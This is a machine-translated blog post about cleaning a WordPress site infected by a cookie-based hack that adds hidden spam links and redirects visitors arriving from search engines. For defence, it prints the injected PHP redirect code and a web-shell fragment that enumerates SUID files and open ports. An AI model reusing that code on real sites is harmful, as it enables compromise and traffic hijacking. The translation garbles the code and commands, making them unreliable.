У блогосфері зловив помилку ... Але мені, що у вас було?

Минулого місяця, я отримав попередження Вірус блог У деяких відвідувачів. Спочатку я проігнорував попередження, тому що я встановив досить хороший антивірус (Kaspersky AV 2009), І хоча блог протягом довгого часу, я ніколи не отримував попередження вірус (.. Я бачив щось підозріле раніше, що перше оновлення зникли. Нарешті ...).
Повільно стали з'являтися великі зміни трафік відвідувачівПісля чого рух останнім часом неухильно падає і почав все більше і більше людей, які кажуть мені, що stealthsettings.com це virused. Вчора я отримав від когось скріншот робиться, коли антивірус блокував сценарій stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Це було досить переконливим мені, що я поклав всі джерела пошуку. Перше, що прийшло мені в голову було зробити модернізація остання версія WordPress (2.5.1), але не раніше, ніж старий сценарій, щоб видалити всі файли WordPress і зробити резервної копії бази даних, Ця процедура не принесла жодних результатів, і, мабуть, довго було б розповісти, де було буба, якщо б це не було сказано у дискусії за чашкою кави, він виявив, Google, і було б добре, щоб побачити його.
MyDigitalLife.info опублікувала статтю під назвою "WordPress Hack: відновлення і виправлення Google і пошукової чи ні Cookie Трафік перенаправляється на Your-Needs.info, AnyResults.Net, золотисто-Info.net та інших незаконних сайтів«Це кінець нитки, що потрібно.
Йдеться про експлуатувати WordPress на основі печива, Яку я думаю, це дуже складний і зробив книгу. Досить розумний, щоб зробити SQL-ін'єкція База даних блогу, створити невидиму користувач Проста перевірка рутинної Інформаційна панель->користувачів, перевіряти сервер каталогів і файлів "для запису" (С CHMOD 777), шукати і виконувати Файли з правами привілейованого користувача або групи. Я не знаю, хто експлуатує ім'я і бачимо, що є кілька статей, написаних про нього, незважаючи на те, що багато блоги інфікованими, включаючи Румунію. Добре ... Я постараюся, щоб спробувати пояснити загальними про вірус.

Що таке вірус?

У першу чергу встановіть джерело сторінки в блогах, посилання невидимими для відвідувачів, але видимих ​​і індексованою для пошукових систем, особливо Google. Таким чином передачі Page Rank на сайти, зазначені зловмисником, По-друге, один вставлений Перенаправлення код URL для відвідувачів з Google, Live, Yahoo, ... або RSS Reader, а не на сайт печиво. антивірус визначає, як перенаправити Trojan-Clicker.HTML.

Симптоми:

Масштабне падіння відвідуваності, Особливо в блогах, де більшість відвідувачів приходять з Google.

Ідентифікація: (Таким чином, стало проблемою для тих, хто не знає, як, як PhpMyAdmin, PHP і Linux)

Лос-Анджелес. УВАГА! Спочатку зробіть резервну копію бази даних!

1. Перевірте вихідні файли index.php, header.php, footer.php, Темою блогу і подивитися, якщо є код, який використовує шифрування base64 або містить ", якщо ($ Ser ==" 1 SizeOf && ($ _COOKIE) == 0?) "формі:

Seref $ = Array ("Google", "MSN", "жити", "Апорт"
"Ask", "Yahoo", "AOL", "CNN", "погода", "Алекса");
$ Ser = 0; Еогеасп ($ $ Seref як посилання)
Якщо (StrPos (strtolower
($ _SERVER ['HTTP_REFERER']), $ Ref) == FALSE) {$ Ser = "1;? Перерви;}!
якщо ($ Ser == "1 SizeOf && ($ _COOKIE) == 0?) {Header (" Location: ". base64_decode (" ').' http:// YW55cmVzdWx0cy5uZXQ = / ') вихід;
}>

... Або щось. Видалити цей код!

Натисніть на зображення ...

Індекс код

На скріншоті вище я вибрав помилково, і "<Php get_header ();?>". Цей код повинен залишатися.

2. Використовувати PHPMYADMIN і перейти до таблиці бази даних wp_usersДе перевірити, якщо немає імені користувача створюється на 00:00:00 0000-00-00 (Можливе розміщення user_login писати "WordPress". Написати цей ідентифікатор користувача (поле ID), а потім видалити його.

Натисніть на зображення ...

псевдопользователь

* Зелена лінія повинна бути видалена і зберіг свій ID. У разі Був ID = 8 .

3. Підійдіть до столу wp_usermeta, Де розташований і витирати ліній ID (де поле user_id ID значення з'являється видалені).

4. У таблиці wp_option, До active_plugins і подивитися, що плагін включений підозрюваного. Він може бути використаний як закінчень _old.giff, _old.pngg, _old.jpeg, _new.php.giffі т. д. комбінації фальшивих розширень з _old та _new.

SELECT * FROM wp_options ДЕ option_name = 'active_plugins'

Видалити цей плагін, а потім перейти на блог -> Панель управління -> Плагіни, які дезактивують і активувати певний плагін.

Натисніть на зображення, щоб подивитись здається active_plugins вірусом файл.

підключати

Слідуйте по дорозі на FTP або SSH, зазначених у active_plugins і видаліть файл з сервера.

5. У PhpMyAdmin, в таблиці wp_option, Пошук і видалення рядок, що містить "rss_f541b3abd05e7962fcab37737f40fad8"І серед"internal_links_cache ".
У internal_links_cache зроблені зашифровані посилання спамом, які з'являються в ваш блог і Google Adsense код, Хакер.

6. Рекомендується використовувати для змінити пароль Блог і Увійти видалити всі підозрілі userele. Оновлення до останньої версії WordPress і встановити блог, щоб не допустити реєстрації нових користувачів. Там немає втрат ... не можу коментувати і нелогічним.

Я спробував вище, щоб пояснити, скільки, що робити в такій ситуації, щоб очистити блог від цього вірусу. Проблема набагато гірша, ніж вона здається і навіть не вирішена, бо вона використовується уразливості безпеки веб-сервер хостинг, який блогу.

У якості першої заходи безпеки, доступ SSH, Зробити деякі перевірки на сервері, щоб подивитися, які файли, такі як * _old * і * _new. * З закінчень.Гіффен,. JPEG,. pngg,. jpgg. Ці файли повинні бути видалені. Якщо перейменувати файл, наприклад. top_right_old.giff in top_right_old.phpМи бачимо, що файл є саме сервер шкідливий код.

Деякі корисні поради для перевірки, очищення та захисту сервера. (через SSH)

1. CD / TMP і перевірити, чи немає папки, такі як tmpVFlma або інші комбінації має же ім'ям і видалити його. Дивіться на скріншот нижче, дві такі папки від мене:

tmpserver

РМ-РФ FolderName

2. Перевірте elimiati (CHMOD змінити) як можливі атрибути папки CHMOD 777

знайти всі записувані файли в поточній директорії: Знайти. -Type F-Перм-2-LS
знайти всі записи каталоги в поточному каталозі: Знайти. -Type D-Перм-2-LS
знайти всі записи каталоги і файли в поточній директорії: Знайти. -Перм-2-LS

3. Шукаєте підозрілих файлів на сервері.

Знайти. -Name "* _new.php *"
Знайти. -Name "* _old.php *"
Знайти. -Name "*. Jpgg"
Знайти. -Name "* _giff"
Знайти. -Name "* _pngg"

4, УВАГА! файли, які були встановлені трохи SUID si SGID. Ці файли виконуються з привілеями користувача (групу) або корінь, але не користувача запустити файл. Ці файли можуть призвести до кореневої компромісу, якщо питання безпеки. Якщо ви використовуєте файли з SUID і SGID біти, виконайте 'CHMOD 0 " або деінсталювати пакет, що містять їх.

Атака із застосуванням десь в джерело ...:

якщо (! $ safe_mode) {
якщо ($ os_type == 'Нікс') {
$ OS = Execute ('Sysctl kern.ostype-н.');
$ OS = Execute ('Sysctl kern.osrelease-н.');
$ OS = Execute ('Sysctl kernel.ostype-н.');
$ OS = Execute ('Sysctl kernel.osrelease-н.');
якщо (порожньо ($ USER)) $ = користувачеві виконати ('ID');
Псевдонімів $ = Array (
"=>",
"Знайти файли SUID '=>' знайти / типу F-Перм-04000-LS '
'Знайти SGID файли' => 'знайти / типу F-Перм-02000-LS'
"Шукати всі записувані файли в поточній директорії '=>' знайти. -Type F-Перм-2-LS '
"Шукати всі записи каталоги в поточній директорії '=>' знайти. -Type D-Перм-2-LS '
"Шукати всі записи каталоги і файли в поточній директорії '=>' знайти. -Перм-2-LS '
"Показувати відкриті порти '=>' NetStat-| GREP-я слухаю,
);
} Ще {
. $ Os_name = Execute ('версії');
$ USER = Execute («Ехо% ім'я користувача%. ');
Псевдонімів $ = Array (
"=>",
"Показати підніжка послуги '=>' чистий старт"
"Показати список процесів '=>' Список завдань '
);
}

Таким чином ... в основному знаходить проломи в безпеці. Порти відкривати каталоги "записи" і групи виконання привілеїв файлів / коренем.

Назад Детальніше ...

Деякі блоги інфікованих: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / блог,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / блог /,

www.mirabilismedia.ro / блог, Blog.einvest.ro
... Цей список можна продовжувати ... багато.

Ви можете перевірити, якщо блог є вірус, використовуючи Google пошукової системи. копія і паста:

купити сайт www.blegoo.com

На добраніч і збільшити працювати ;) Скоро я придумав на поновлення Eugen prevezibil.imprevizibil.com.

BRB :)

TO: УВАГА! Зміна WordPress теми або оновлення до WordPress 2.5.1, а не рішення, щоб позбутися від цього вірусу.

У блогосфері зловив помилку ... Але мені, що у вас було?

Про автора

Хитрість

Пристрасний про все, що гаджет і IT писати з задоволенням stealthsettings.com з 2006 і мені подобається відкривати нові речі з вами про комп'ютери та MacOS, Linux, Windows, прошивці і Android.

Залишити коментар

Цей сайт використовує Akismet для зменшення спаму. Дізнайтеся, як обробляються ваші дані коментарів.